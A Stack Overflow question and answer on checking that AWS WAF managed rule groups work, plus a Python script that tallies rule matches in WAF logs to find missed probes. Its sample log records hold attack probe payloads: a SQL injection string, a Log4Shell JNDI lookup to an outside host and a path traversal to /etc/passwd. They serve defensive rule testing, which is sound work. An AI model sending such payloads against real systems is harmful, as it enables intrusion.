How can I run tests against web ACLs in AWS to be sure the rules are working as intended?
1.) BotControl
2.) AmazonIpReputationList
3.) AnonymousIp
4.) CommonRuleSet
5.) KnownBadInputs
6.) LinuxRuleSet
7.) SQL injection
These are all rule sets I have set in place, but is there a way for me to test against them to make sure they are working as intended?
Solution 1:[1]
Basically, you would like to test your rules; here are my 2 cents.
- Counting the web requests that match the rules in a web ACL
  - Configure all the rules in a web ACL to count web requests
  - Set the default action for the web ACL to allow requests
- Viewing a sample of the web requests that API Gateway, CloudFront, or an Application Load Balancer has forwarded to AWS WAF Classic
In the AWS WAF Classic console, you can view a sample of the requests that API Gateway, CloudFront, or an Application Load Balancer has forwarded to AWS WAF Classic for inspection. For each sampled request, you can view detailed data about the request, such as the originating IP address and the headers included in the request. You can also view which rule the request matched, and whether the rule is configured to allow or block requests.
- Logging and monitoring web ACL traffic
You can enable logging to get detailed information about traffic that is analyzed by your web ACL. Logged information includes the time that AWS WAF received a web request from your AWS resource, detailed information about the request, and details about the rules that the request matched. You can send your logs to an Amazon CloudWatch Logs log group, an Amazon Simple Storage Service (Amazon S3) bucket, or an Amazon Kinesis Data Firehose.
Please refer to this doc for more information.
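As an added, runnable example (not part of the question or the answer above): once the rule groups are in count mode, the default action is ALLOW and logging is on, the useful check is to send a few probe requests and then, from the logs, tally which rule matched each probe and flag any probe that matched nothing in the rule group it was meant to trigger. The script below does that over constructed WAF log records. The field names (`ruleGroupList`, `nonTerminatingMatchingRules`, `terminatingRule`, `terminatingRuleType`, `httpRequest.headers`) follow the WAFv2 logging format, which is what the managed rule groups listed in the question run under; every value, the ARN, the rule group IDs and the `X-Probe-Id` header convention are assumptions made for this example, and the records are trimmed to the fields the code reads.

```python
import json
from collections import Counter

# Constructed AWS WAF (v2) log records, one JSON object per line, trimmed to the
# fields used below. The web ACL is in "count everything, default ALLOW" mode
# except the last record, which shows a terminating BLOCK from a managed rule group.
SAMPLE_LOG_LINES = [
    '{"timestamp":1700000000000,"formatVersion":1,"webaclId":"arn:aws:wafv2:us-east-1:123456789012:regional/webacl/test-acl/0000","terminatingRuleId":"Default_Action","terminatingRuleType":"REGULAR","action":"ALLOW","ruleGroupList":[{"ruleGroupId":"AWS#AWSManagedRulesSQLiRuleSet","terminatingRule":null,"nonTerminatingMatchingRules":[{"ruleId":"SQLi_QUERYARGUMENTS","action":"COUNT"}]}],"nonTerminatingMatchingRules":[],"httpRequest":{"clientIp":"203.0.113.10","uri":"/login","args":"user=%27%20or%201%3D1--","httpMethod":"GET","headers":[{"name":"Host","value":"example.com"},{"name":"X-Probe-Id","value":"sqli-query-1"}]}}',
    '{"timestamp":1700000001000,"formatVersion":1,"webaclId":"arn:aws:wafv2:us-east-1:123456789012:regional/webacl/test-acl/0000","terminatingRuleId":"Default_Action","terminatingRuleType":"REGULAR","action":"ALLOW","ruleGroupList":[{"ruleGroupId":"AWS#AWSManagedRulesKnownBadInputsRuleSet","terminatingRule":null,"nonTerminatingMatchingRules":[{"ruleId":"Log4JRCE","action":"COUNT"}]}],"nonTerminatingMatchingRules":[],"httpRequest":{"clientIp":"203.0.113.10","uri":"/","args":"","httpMethod":"GET","headers":[{"name":"Host","value":"example.com"},{"name":"User-Agent","value":"${jndi:ldap://203.0.113.5/x}"},{"name":"X-Probe-Id","value":"log4j-header-1"}]}}',
    '{"timestamp":1700000002000,"formatVersion":1,"webaclId":"arn:aws:wafv2:us-east-1:123456789012:regional/webacl/test-acl/0000","terminatingRuleId":"Default_Action","terminatingRuleType":"REGULAR","action":"ALLOW","ruleGroupList":[],"nonTerminatingMatchingRules":[],"httpRequest":{"clientIp":"203.0.113.10","uri":"/../../etc/passwd","args":"","httpMethod":"GET","headers":[{"name":"Host","value":"example.com"},{"name":"X-Probe-Id","value":"lfi-path-1"}]}}',
    '{"timestamp":1700000003000,"formatVersion":1,"webaclId":"arn:aws:wafv2:us-east-1:123456789012:regional/webacl/test-acl/0000","terminatingRuleId":"Default_Action","terminatingRuleType":"REGULAR","action":"ALLOW","ruleGroupList":[],"nonTerminatingMatchingRules":[],"httpRequest":{"clientIp":"198.51.100.7","uri":"/index.html","args":"","httpMethod":"GET","headers":[{"name":"Host","value":"example.com"}]}}',
    '{"timestamp":1700000004000,"formatVersion":1,"webaclId":"arn:aws:wafv2:us-east-1:123456789012:regional/webacl/test-acl/0000","terminatingRuleId":"AWS-AWSManagedRulesAnonymousIpList","terminatingRuleType":"MANAGED_RULE_GROUP","action":"BLOCK","ruleGroupList":[{"ruleGroupId":"AWS#AWSManagedRulesAnonymousIpList","terminatingRule":{"ruleId":"AnonymousIPList","action":"BLOCK"},"nonTerminatingMatchingRules":[]}],"nonTerminatingMatchingRules":[],"httpRequest":{"clientIp":"192.0.2.44","uri":"/","args":"","httpMethod":"GET","headers":[{"name":"Host","value":"example.com"},{"name":"X-Probe-Id","value":"anon-ip-1"}]}}',
]

# Assumed convention: every probe request carries this header so it can be found
# in the logs; the value names the test case.
PROBE_HEADER = "x-probe-id"

# Assumed test plan: which rule group each probe is expected to trigger.
EXPECTED_GROUPS = {
    "sqli-query-1": "AWS#AWSManagedRulesSQLiRuleSet",
    "log4j-header-1": "AWS#AWSManagedRulesKnownBadInputsRuleSet",
    "lfi-path-1": "AWS#AWSManagedRulesCommonRuleSet",
    "anon-ip-1": "AWS#AWSManagedRulesAnonymousIpList",
}


def probe_id(record):
    """Return the probe name from the request headers, or None for ordinary traffic."""
    for header in record["httpRequest"].get("headers", []):
        if header.get("name", "").lower() == PROBE_HEADER:
            return header.get("value")
    return None


def rule_matches(record):
    """Yield (rule_group, rule_id, action) for every rule that matched the request:
    COUNT-mode (non-terminating) matches and, if present, the terminating rule."""
    for group in record.get("ruleGroupList", []):
        group_id = group.get("ruleGroupId", "")
        for rule in group.get("nonTerminatingMatchingRules", []):
            yield group_id, rule.get("ruleId", ""), rule.get("action", "")
        terminating = group.get("terminatingRule")
        if terminating:
            yield group_id, terminating.get("ruleId", ""), terminating.get("action", "")
    # Rules defined directly in the web ACL rather than in a rule group.
    for rule in record.get("nonTerminatingMatchingRules", []):
        yield "<web-acl>", rule.get("ruleId", ""), rule.get("action", "")
    term_id = record.get("terminatingRuleId")
    if term_id and term_id != "Default_Action" and record.get("terminatingRuleType") in ("REGULAR", "RATE_BASED"):
        yield "<web-acl>", term_id, record.get("action", "")


def summarize(log_lines):
    """Return (rule_counts, probe_results): how often each (group, rule, action) fired,
    and the list of matches for every probe request seen."""
    rule_counts = Counter()
    probe_results = {}
    for line in log_lines:
        record = json.loads(line)
        matched = list(rule_matches(record))
        rule_counts.update(matched)
        pid = probe_id(record)
        if pid is not None:
            probe_results.setdefault(pid, []).extend(matched)
    return rule_counts, probe_results


def unmatched_probes(probe_results, expected):
    """Probes that did not fire any rule in the rule group they were meant to hit:
    the payload went through without even a COUNT, which is the gap you are testing for."""
    return sorted(
        pid for pid, group in expected.items()
        if not any(g == group for g, _, _ in probe_results.get(pid, []))
    )


if __name__ == "__main__":
    counts, probes = summarize(SAMPLE_LOG_LINES)
    for (group, rule, action), n in sorted(counts.items()):
        print(f"{n:4d}  {action:<6} {group}/{rule}")
    for pid in unmatched_probes(probes, EXPECTED_GROUPS):
        print(f"MISSED: probe {pid} matched nothing in {EXPECTED_GROUPS[pid]}")
```

Run it against the export of your log group or S3 log files instead of the constructed lines (one JSON record per line in both cases). A probe listed under MISSED means the rule group never saw the payload as a match, so switching that group from count to block would not have stopped it; probes that show up with a COUNT match are the ones it is safe to promote.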
Sources
This article follows the attribution requirements of Stack Overflow and is licensed under CC BY-SA 3.0.
Source: Stack Overflow
| Solution | Source |
|---|---|
| Solution 1 | MrOverflow |
